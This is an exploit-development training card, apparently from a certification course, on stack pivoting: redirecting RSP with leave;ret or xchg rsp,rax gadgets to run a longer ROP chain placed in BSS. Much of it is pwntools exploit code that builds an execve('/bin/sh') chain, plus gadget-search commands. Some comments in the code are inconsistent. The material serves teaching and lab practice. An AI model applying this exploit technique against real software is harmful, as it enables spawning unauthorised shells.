Stack Pivot Technique: RSP Redirection to Attacker-Controlled Memory for Extended ROP Chain Execution

crypto_asymmetric Difficulty 1–5 30 min certifiable

Theory

Why This Matters

Stack pivoting is required when the available overflow space on the original stack is insufficient to hold a complete ROP chain. This happens in constrained read sizes (e.g., only 16 bytes overflowable beyond the buffer), or when the overflow overwrites only the return address with no room for gadget arguments. The solution is to redirect RSP to a larger controlled memory region — the heap, the BSS, or a mapped buffer — where the full chain is already written. NICE K0168 (exploit code) and S0131 (develop exploits) require knowing the two primary pivot gadgets (xchg rsp, rax; ret and leave; ret) and how to combine them with a prior write primitive to set up a complete chain in an arbitrary location.

Core Concept

A stack pivot redirects RSP from its current value to an attacker-controlled address. After the pivot, all subsequent ret instructions use the new RSP, executing gadgets from the controlled memory region.

Primary pivot gadgets:

xchg rsp, rax; ret: swaps RSP and RAX. If RAX is loaded with the target address (e.g., via a prior pop rax; ret gadget, or because a function returned a heap pointer in RAX), this redirects the stack to that address.
leave; ret: equivalent to mov rsp, rbp; pop rbp; ret. When RBP is controlled (e.g., via saved RBP overwrite in the overflow), leave sets RSP to RBP, then pop rbp pops the first 8 bytes from the new RSP into RBP. The subsequent ret pops the next 8 bytes as the new RIP. This makes the 8 bytes immediately after the RBP value the first gadget in the chain.

Chain structure with leave; ret pivot:

On original stack (small overflow allows writing RBP + RIP):
  [RBP overwrite] = target_region - 8   (leave will set RSP to this, then pop RBP from *RSP)
  [RIP overwrite] = address of "leave; ret" gadget

At target_region (heap/BSS, pre-written with full chain):
  [target_region + 0x00] = junk for pop rbp (consumed by leave's pop rbp)
  [target_region + 0x08] = first real gadget address
  [target_region + 0x10] = first gadget argument
  ...

Setting up the target region: write the full ROP chain to a known address before triggering the pivot. Common methods: - Write to BSS via a format string %n write or a prior read(stdin, bss, N) call in the ROP chain. - The heap (if a heap allocation at a known offset from heap base was made). - An mmap'd region (if the binary maps executable memory that is also writable).

Technical Deep-Dive

from pwn import *

elf  = ELF('./stack_pivot')
libc = ELF('./libc.so.6')
p    = process('./stack_pivot')

# After libc leak (standard ret2libc leak stage):
libc.address = 0x7f1234560000  # example

# ── Gadgets ──────────────────────────────────────────────────────────────
leave_ret    = 0x401234        # leave; ret  (in binary)
pop_rax_ret  = libc.address + 0x36174   # pop rax; ret
xchg_rsp_rax = libc.address + 0x54d27  # xchg rsp, rax; ret

# ── Target region: BSS area (writable, known address) ────────────────────
bss_chain    = elf.bss() + 0x100       # start of chain in BSS

# ── Build the full ROP chain to write at bss_chain ───────────────────────
pop_rdi   = libc.address + 0x23b6a
pop_rsi   = libc.address + 0x2601f
pop_rdx   = libc.address + 0x142c92
syscall   = libc.address + 0x630d9
binsh     = next(libc.search(b'/bin/sh'))

full_chain  = p64(pop_rdi)  + p64(binsh)
full_chain += p64(pop_rsi)  + p64(0)
full_chain += p64(pop_rdx)  + p64(0)
full_chain += p64(pop_rax_ret) + p64(59)
full_chain += p64(syscall)

# ── Stage 1: write full_chain to BSS via read(0, bss_chain, len(full_chain)) ──
# Use a ROP chain that fits in the small overflow to call read():
small_chain  = b'A' * 16       # small buffer
small_chain += p64(bss_chain)   # overwrite saved RBP with bss_chain - 8 + 8 = bss_chain
#              (for leave;ret: RBP should be target - 8, but adjust for your layout)

# ... read() call to write full_chain to BSS ...
# (this is a simplified illustration; actual implementation uses pop gadgets for read args)

# ── Stage 2: pivot to BSS chain ──────────────────────────────────────────
# Method A: xchg rsp, rax (if read() returned bss_chain in RAX)
pivot_payload  = b'A' * 16
pivot_payload += p64(xchg_rsp_rax)   # RIP: pivot RSP to RAX (bss_chain)
# (RAX = return value of read() = len(full_chain) -- not useful; use pop rax instead)

# Method B: leave; ret (controlled RBP)
pivot_payload2  = b'A' * 8         # fill small buffer
pivot_payload2 += p64(bss_chain - 8) # saved RBP: leave sets RSP = rbp = bss_chain-8
                                      # then pops rbp from *rsp = *(bss_chain-8) = junk
pivot_payload2 += p64(leave_ret)     # saved RIP: execute leave;ret

p.sendline(pivot_payload2)
p.interactive()

Finding xchg rsp, rax; ret:

ROPgadget --binary ./libc.so.6 --rop | grep "xchg rsp, rax"
# If not found in binary, search libc:
ROPgadget --binary ./libc.so.6 | grep "xchg esp, eax"  # 32-bit variant
# Or use: push rax; pop rsp; ret (equivalent effect)
ROPgadget --binary ./libc.so.6 | grep "push rax" | grep "pop rsp"

BSS chain writing via read syscall in ROP:

# Compact ROP to call read(0, bss_chain, 0x100):
pop_rdi = 0x401263
pop_rsi_r15 = 0x401261   # pop rsi; pop r15; ret (common in __libc_csu_init)
read_plt = elf.plt['read']

stage1  = b'A' * offset
stage1 += p64(pop_rdi)     + p64(0)          # fd = stdin
stage1 += p64(pop_rsi_r15) + p64(bss_chain) + p64(0)  # buf = bss_chain, r15 = 0
# For rdx (read count): use pop_rdx or __libc_csu_init gadget
stage1 += p64(read_plt)    # call read() -- waits for input
stage1 += p64(leave_ret)   # pivot after read returns

p.sendline(stage1)
p.send(full_chain)         # write full chain to BSS via stdin
p.interactive()

Reverse Engineering Methodology

Determine the available overflow size: cyclic_find(rip_crash) - (len(cyclic) - read_count). If only RBP + RIP are overflowable (16 bytes), leave; ret is the only pivot option.
Find leave; ret gadget: ROPgadget --binary ./binary --rop | grep "leave". It appears in almost every binary's function epilogues.
Identify the target region for the full chain: prefer BSS (always present, known address, writable, not randomised on non-PIE). Use readelf -S ./binary | grep bss for the address.
Verify the pivot in GDB: set a breakpoint at leave, run to it, inspect RSP before and after, confirm RSP moves to the target region. Then step through the full chain.

Common Reversing Errors

leave; ret pivoting 8 bytes too early: leave does mov rsp, rbp; pop rbp. The pop rbp consumes 8 bytes from the new RSP. The first gadget of the chain is at target + 8, not target + 0. Place a junk qword at target and start the real chain at target + 8.
BSS address colliding with existing data: the BSS section contains zero-initialised globals. Writing a ROP chain to BSS mid-section may overwrite a global used by the program. Use elf.bss() + 0x200 or a higher offset to avoid existing globals.
xchg rsp, rax uses the wrong RAX value: xchg rsp, rax uses RAX at the moment of execution, not a value set earlier in the chain. If a function call between setting RAX and the xchg clobbers RAX (e.g., puts() returns a length in RAX), the pivot target is wrong. Arrange the pivot immediately after loading the target into RAX.
Forgetting that leave; ret requires correct stack alignment: the chain in the target region must start with a valid gadget address at target + 8. Misalignment or wrong byte order in the chain data causes the pivoted execution to jump to an invalid address.

Challenge Lab

Reinforce your learning with a hands-on generated challenge based on this card's competency.